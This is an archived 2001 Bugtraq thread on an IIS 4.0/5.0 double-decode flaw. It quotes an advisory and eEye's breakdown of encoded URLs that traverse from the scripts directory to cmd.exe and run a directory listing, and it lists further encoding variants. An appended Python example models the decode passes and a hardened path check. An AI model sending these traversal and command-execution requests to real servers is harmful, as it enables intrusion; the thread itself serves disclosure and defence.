Bugtraq mailing list archives

Re: New vulnerability in IIS4.0/5.0


From: Dave Ahmad <da () securityfocus com>
Date: Wed, 19 Sep 2001 13:50:02 -0600 (MDT)


This seems to be just another way to exploit the double decode
vulnerability (Bugtraq ID 2708).  There is a possibility that it may be a
new issue due to the use of the '%u' method of encoding.  It does not look
that way to us.

On our test machines (and at eEye), systems do not seem to be vulnerable
after applying the MS01-026 hotfix (or the MS01-044 patch).

Ryan Permeh of eEye Digital Security provided a breakdown of an encoded
attack string:

The attack string used successfully against an IIS server (Win2K, SP2):

http://localhost/scripts/..%u0025u005c..%u0025u005cwinnt/system32/cmd.exe?/c+dir+c:\

first decode sequence (it replaces %u0025 with %)
http://localhost/scripts/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\

second decode sequence (it replaces %u005c with /)
http://localhost/scripts/../../winnt/system32/cmd.exe?/c+dir+c:\

The double decode vulnerability is fixed in MS01-026.   I believe the fix
is included in the cumulative patch released with MS01-044.

It doesn't look like a new vulnerability, but we are awaiting confirmation
from Microsoft.

Has anyone managed to exploit a patched system?

Thanks Ryan & eEye.

Regards,

Dave Ahmad
Security Focus
www.securityfocus.com

On Wed, 19 Sep 2001, ALife // BERG wrote:

-----[ Bright Eyes Research Group | Advisory # be00001e ]-----------------

             Remote users can execute any command on several
               IIS 4.0 and 5.0 systems by using UTF codes

-------------------------------------[ security.instock.ru ]--------------

Topic:              Remote users can execute any command on several
                    IIS 4.0 and 5.0 systems by using UTF codes

Announced:          2001-09-19
Credits:            ALife <buginfo () inbox ru>
Affects:            Microsoft IIS 4.0/5.0

--------------------------------------------------------------------------

---[ Description

     For example, the target has a virtual executable directory (e.g.
"scripts") that is located on the same drive as the Windows system.
Submit a request like this:

http://target/scripts/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\

The directory listing of C:\ will be revealed.

Of course, the same effect can be achieved by applying this kind of
processing to '/' and '.'. For example: "..%u002f", ".%u002e/", "..%u00255c",
"..%u0025%u005c" ...

Note: An attacker can run commands with the privileges of the
      IUSR_machinename account only.
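The two decode passes Ryan Permeh traces above, and the "..%u005c" requests in the advisory, as an added Python example (not code from this thread, from eEye, or from IIS itself): it replays the decoding on the request path only and contrasts a traversal check made after a single decode, which the double-encoded form slips past, with a check made on the fully canonicalised path. The %uXXXX handling is a simplified model of the behaviour the thread describes, not IIS's actual parser, and the sample paths are the thread's own strings with the query part dropped.

```python
import re
from posixpath import normpath

# One IIS-style %uXXXX escape or one standard %XX escape.
_ESCAPE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")

# Request paths taken from the thread (query string removed); constructed
# benign path for comparison.
DOUBLE_ENCODED = "/scripts/..%u0025u005c..%u0025u005cwinnt/system32/cmd.exe"
SINGLE_ENCODED = "/scripts/..%u005c..%u005cwinnt/system32/cmd.exe"
BENIGN = "/scripts/tool.asp"


def decode_once(path: str) -> str:
    """Apply one decoding pass: %uXXXX -> chr(0xXXXX), %XX -> chr(0xXX).
    Simplified model of the two-pass behaviour described in the thread."""
    def sub(m):
        hexval = m.group(1) or m.group(2)
        return chr(int(hexval, 16))
    return _ESCAPE.sub(sub, path)


def decode_trace(path: str, max_passes: int = 8) -> list:
    """Decode repeatedly until the string stops changing and return every
    intermediate form, so each pass can be inspected."""
    trace = [path]
    for _ in range(max_passes):
        nxt = decode_once(trace[-1])
        if nxt == trace[-1]:
            return trace
        trace.append(nxt)
    raise ValueError("escape nesting too deep")


def decode_fully(path: str) -> str:
    """Fully decoded (fixpoint) form of the path."""
    return decode_trace(path)[-1]


def _has_dotdot_segment(path: str) -> bool:
    return any(seg == ".." for seg in re.split(r"[/\\]", path))


def naive_is_safe(request_path: str) -> bool:
    """Flawed check: looks for a '..' segment after ONE decode, while the
    server later decodes again. This is the gap the double-decode bug uses:
    '..%u005c' has no '..' segment yet, but becomes '..\\' on the next pass."""
    return not _has_dotdot_segment(decode_once(request_path))


def hardened_is_safe(request_path: str, webroot: str = "/scripts") -> bool:
    """Canonicalise first (decode to a fixpoint, unify separators, normpath),
    then require the result to stay inside the intended virtual directory."""
    decoded = decode_fully(request_path)
    if any(ord(c) < 0x20 or c == "\x7f" for c in decoded):
        return False  # control characters never belong in a path
    canonical = normpath(decoded.replace("\\", "/"))
    return canonical == webroot or canonical.startswith(webroot + "/")


if __name__ == "__main__":
    for i, form in enumerate(decode_trace(DOUBLE_ENCODED)):
        print(f"pass {i}: {form}")
    for p in (DOUBLE_ENCODED, SINGLE_ENCODED, BENIGN):
        print(f"{p!r}: naive={naive_is_safe(p)} hardened={hardened_is_safe(p)}")
```

The single-encoded request is caught by both checks; the double-encoded one passes the naive check because the traversal only appears after the second decode. The fix pattern is the same one MS01-026 is described as applying: decide on the canonical path, never on a partially decoded one. From a monitoring point of view, `%u` escapes in request paths are rare in legitimate traffic and are worth flagging in IIS logs.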
